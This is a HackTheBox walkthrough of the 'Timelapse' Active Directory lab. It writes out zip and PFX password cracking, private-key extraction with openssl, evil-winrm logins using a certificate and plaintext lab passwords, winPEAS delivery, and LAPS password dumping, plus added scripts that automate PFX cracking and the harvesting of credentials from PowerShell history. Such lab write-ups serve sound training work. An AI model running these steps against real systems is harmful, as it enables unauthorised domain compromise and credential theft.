Timelapse HackTheBox Walkthrough

Summary

Timelapse is an HTB Active Directory machine rated Easy, but because the initial compromise relies on an unusual concept I believe it should be categorised as Intermediate. By solving this lab I learned how an attacker who gets hold of a user’s client authentication certificate (an exported PFX) can use it in place of a password to authenticate over WinRM and move laterally.

Table of Contents

Initial Access

· Nmap

· SMBClient

· OpenSSL

· WinRM

Privilege Escalation

· WinPEAS

· Credential Dumping

· Abusing LAPS

Initial Access

Let’s dive in.

Nmap

From the nmap scan we can see that this is a Windows Server, more precisely a domain controller, since the classic DC services are exposed: DNS (53), Kerberos (88), LDAP (389) and SMB (445). WinRM (Windows Remote Management) is also present on port 5986, which is its HTTPS port, so any WinRM client we use later has to be told to use TLS (evil-winrm’s -S).


SMBClient

Let’s use smbclient to check whether any shares allow anonymous (null-session) access. There is one, named “Shares”.

Connecting to that share with smbclient and browsing its subfolders turns up winrm_backup.zip. The archive is password protected, so we need to crack it.

In our scenario we use fcrackzip to crack winrm_backup.zip with the rockyou.txt wordlist (-D selects dictionary mode, -u makes fcrackzip verify each candidate with unzip so that false positives are weeded out):

fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt


Once the password is cracked we can unzip the archive. Inside is a single file, legacyy_dev_auth.pfx. A PFX file is a PKCS#12 container that bundles a certificate (and thus its public key) with the matching private key, itself protected by a password; the file name suggests this one is a client authentication certificate for a user account, exactly the kind of secret that should never sit on an anonymously readable share.

unzip winrm_backup.zip

pfx2john legacyy_dev_auth.pfx >pfxhash


OpenSSL

Next we turn the PFX into a John-compatible hash with pfx2john and crack it with John against rockyou.txt, which yields the password thuglegacy. Note that this is a second, independent secret: the zip password only protected the archive, while the PFX password protects the private key inside it.

With that password we can inspect the bundle with openssl. The Bag Attributes printed alongside the key name the Microsoft Software Key Storage Provider, i.e. the key was exported from a Windows certificate store. We extract the private key and the certificate into two separate PEM files (openssl prompts for the PFX password; -nodes writes the key unencrypted, so treat the resulting file as the credential it is):

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes


openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
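As an added, self-contained example (not from the original walkthrough), the script below reproduces the whole PFX step on a throwaway bundle: it builds a test PFX with a known password, recovers that password by trying a constructed wordlist against openssl pkcs12 (the slow, dependency-free equivalent of pfx2john followed by john --wordlist=/usr/share/wordlists/rockyou.txt pfxhash, which is what you would use for real), extracts the key and the certificate the way the two commands above do, and finally checks that the extracted private key really belongs to the certificate by comparing the SHA-256 of the public key derived from each. Everything it creates (the certificate subject, the file names, the wordlist, and the password thuglegacy reused from the walkthrough) is made up for the demonstration; it only needs openssl on the path.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough. Needs only openssl.
# All names (subject CN, file names, wordlist entries) are made up; the
# password thuglegacy is reused from the walkthrough for the demo.
set -eu

command -v openssl >/dev/null 2>&1 || { echo "openssl is required for this example" >&2; exit 0; }

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Build a self-signed test certificate and bundle it as a password-protected PFX.
make_test_pfx() {
  pfx="$1"; pass="$2"
  openssl req -x509 -newkey rsa:2048 -nodes -subj "/CN=legacyy-demo" -days 1 \
    -keyout "$WORK/k.pem" -out "$WORK/c.pem" >/dev/null 2>&1
  openssl pkcs12 -export -inkey "$WORK/k.pem" -in "$WORK/c.pem" \
    -out "$pfx" -passout "pass:$pass"
}

# Try each wordlist entry as the PFX password and print the first one that
# verifies the bundle's MAC. Slow but dependency-free; pfx2john + john is the
# real-world tool for this.
crack_pfx() {
  pfx="$1"; wordlist="$2"
  while IFS= read -r candidate; do
    if openssl pkcs12 -in "$pfx" -noout -passin "pass:$candidate" \
         </dev/null >/dev/null 2>&1; then
      printf '%s\n' "$candidate"
      return 0
    fi
  done < "$wordlist"
  return 1
}

# Split the bundle the way the walkthrough does: an unencrypted private key
# (-nodes) and the certificate, as two PEM files in outdir.
extract_pfx() {
  pfx="$1"; pass="$2"; outdir="$3"
  openssl pkcs12 -in "$pfx" -nocerts -nodes -passin "pass:$pass" \
    -out "$outdir/priv-key.pem" 2>/dev/null
  openssl pkcs12 -in "$pfx" -nokeys -passin "pass:$pass" \
    -out "$outdir/certificate.pem" 2>/dev/null
}

# Check that the extracted key really belongs to the certificate by comparing
# the SHA-256 of the public key derived from each file.
key_matches_cert() {
  openssl pkey -in "$1" -noout 2>/dev/null || return 1
  key_hash="$(openssl pkey -in "$1" -pubout 2>/dev/null | openssl sha256)"
  cert_hash="$(openssl x509 -in "$2" -pubkey -noout 2>/dev/null | openssl sha256)"
  [ "$key_hash" = "$cert_hash" ]
}

# Constructed wordlist; the correct password is deliberately not first.
printf 'password\nwinter2021\nthuglegacy\nletmein\n' > "$WORK/words.txt"
make_test_pfx "$WORK/demo.pfx" thuglegacy

FOUND="$(crack_pfx "$WORK/demo.pfx" "$WORK/words.txt")"
echo "recovered PFX password: $FOUND"
extract_pfx "$WORK/demo.pfx" "$FOUND" "$WORK"
if key_matches_cert "$WORK/priv-key.pem" "$WORK/certificate.pem"; then
  echo "private key matches certificate"
else
  echo "key/certificate mismatch" >&2
  exit 1
fi
```

The final comparison is worth keeping in your notes: a PFX can carry a whole certificate chain, and if you intend to authenticate with the pair, the certificate you hand to the client must be the one that belongs to the key, otherwise the TLS client authentication simply fails with no useful error.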


With the certificate and private key in hand we do not need a password at all: WinRM over HTTPS (port 5986) supports certificate-based authentication, and this certificate is evidently mapped to an account on the box, otherwise the login below would fail.

evil-winrm takes the two PEM files directly (-c for the certificate, -k for the private key, -S because the transport is TLS):

evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S -r timelapse


Privilege Escalation

Now we have a shell on the box. There is nothing of interest in the Documents folder, so let’s look at the Desktop; user.txt is there.

Next we need to get winPEASx64.exe onto the target. We will serve it over HTTP with updog; python3 -m http.server would do just as well, but in this walkthrough we use updog, so let’s install it first.


WinPEAS

Once updog is installed, we start it on port 80 from the directory that holds winPEASx64.exe.

On the target we fetch the binary with wget, which in PowerShell is an alias for Invoke-WebRequest (so give it -OutFile, or the download is never written to disk), and then run winPEASx64.exe.

Among its findings winPEAS flags the PowerShell command history. PSReadLine stores it per user at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_History.txt and does not clear it when the console closes, so let’s read that file and see what we can extract from it.

Credential Dumping - LAPS

The history shows the username svc_deploy together with a password that was assigned to the variable p, i.e. typed into an interactive session and therefore logged in clear text. Listing accounts with net user confirms that svc_deploy exists, and checking its group memberships shows it is a member of LAPS_Readers. LAPS (Local Administrator Password Solution) gives every managed machine a unique, randomly generated local Administrator password and rotates it on a schedule, so a local admin hash captured on one host cannot simply be replayed (pass-the-hash) against the others. The passwords themselves are kept in Active Directory, in the ms-Mcs-AdmPwd attribute of each computer object, and are readable only by principals explicitly granted that right, here the LAPS_Readers group. Membership of that group is therefore worth as much as the local Administrator passwords it protects.
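The history-mining step is easy to script. The following is an added example, not part of the original walkthrough: a short shell scanner that pulls plaintext passwords, and the user names they were paired with, out of a PowerShell ConsoleHost_History.txt. The history content embedded in it is constructed for the demonstration, modelled on what this walkthrough describes (a password placed in $p and a credential object built for svc_deploy, with the password reused from the later evil-winrm command); the function names are made up for this example.

```bash
#!/usr/bin/env bash
# Added example, not part of the original walkthrough: pull plaintext
# credentials out of a PowerShell ConsoleHost_History.txt. On a live host the
# file lives at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_History.txt;
# here a constructed copy is written to a temp file. Function names are made up.
set -eu

HIST="$(mktemp)"
trap 'rm -f "$HIST"' EXIT

# Constructed history, modelled on what the walkthrough describes: a password
# stored in $p and a credential object built for svc_deploy. The password is
# the one the walkthrough later uses with evil-winrm.
cat > "$HIST" <<'EOF'
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
exit
EOF

# Password literals passed to ConvertTo-SecureString -AsPlainText: the
# SecureString gives no protection when the source text is logged like this.
extract_plaintext_passwords() {
  sed -n "s/.*ConvertTo-SecureString[[:space:]]*['\"]\([^'\"]*\)['\"].*-AsPlainText.*/\1/p" "$1"
}

# User names handed to a PSCredential constructor.
extract_credential_users() {
  sed -n "s/.*PSCredential[[:space:]]*(['\"]\([^'\"]*\)['\"].*/\1/p" "$1"
}

# Pair the first user with the first password (the common one-login case),
# printed as user:password; fails if either half is missing.
credential_pair() {
  user="$(extract_credential_users "$1" | head -n 1)"
  pass="$(extract_plaintext_passwords "$1" | head -n 1)"
  [ -n "$user" ] && [ -n "$pass" ] || return 1
  printf '%s:%s\n' "$user" "$pass"
}

# Lines that are not secrets but tell you what the operator was doing
# (remote sessions with certificate checks disabled, AD enumeration).
context_lines() {
  grep -niE 'SkipCACheck|-usessl|invoke-command|Get-AD' "$1" || true
}

echo "credential found in history: $(credential_pair "$HIST")"
echo "context:"
context_lines "$HIST"
```

The same scan is useful defensively: PSReadLine writes the history for every interactive session, including ones run under service accounts, so sweeping the ConsoleHost_History.txt files on your own hosts for ConvertTo-SecureString -AsPlainText and PSCredential patterns finds exactly the mistake exploited here.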

Now we can log in with evil-winrm as svc_deploy using the password from ConsoleHost_History.txt, then read the LAPS-managed Administrator password of the domain controller from the ms-Mcs-AdmPwd attribute of its computer object with the ActiveDirectory module (the neighbouring ms-Mcs-AdmPwdExpirationTime attribute tells you how long it stays valid):

evil-winrm -i 10.129.227.105 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Get-ADComputer DC01 -Properties 'ms-Mcs-AdmPwd'


Now that we have the Administrator password we can use evil-winrm once more, this time to log in as administrator.

evil-winrm -i 10.129.227.105 -u administrator -p 'gU}0649&H)l8VrkJB1n95q0A' -S


And we are logged in. Browsing to the Administrator’s Desktop turns up root.txt.
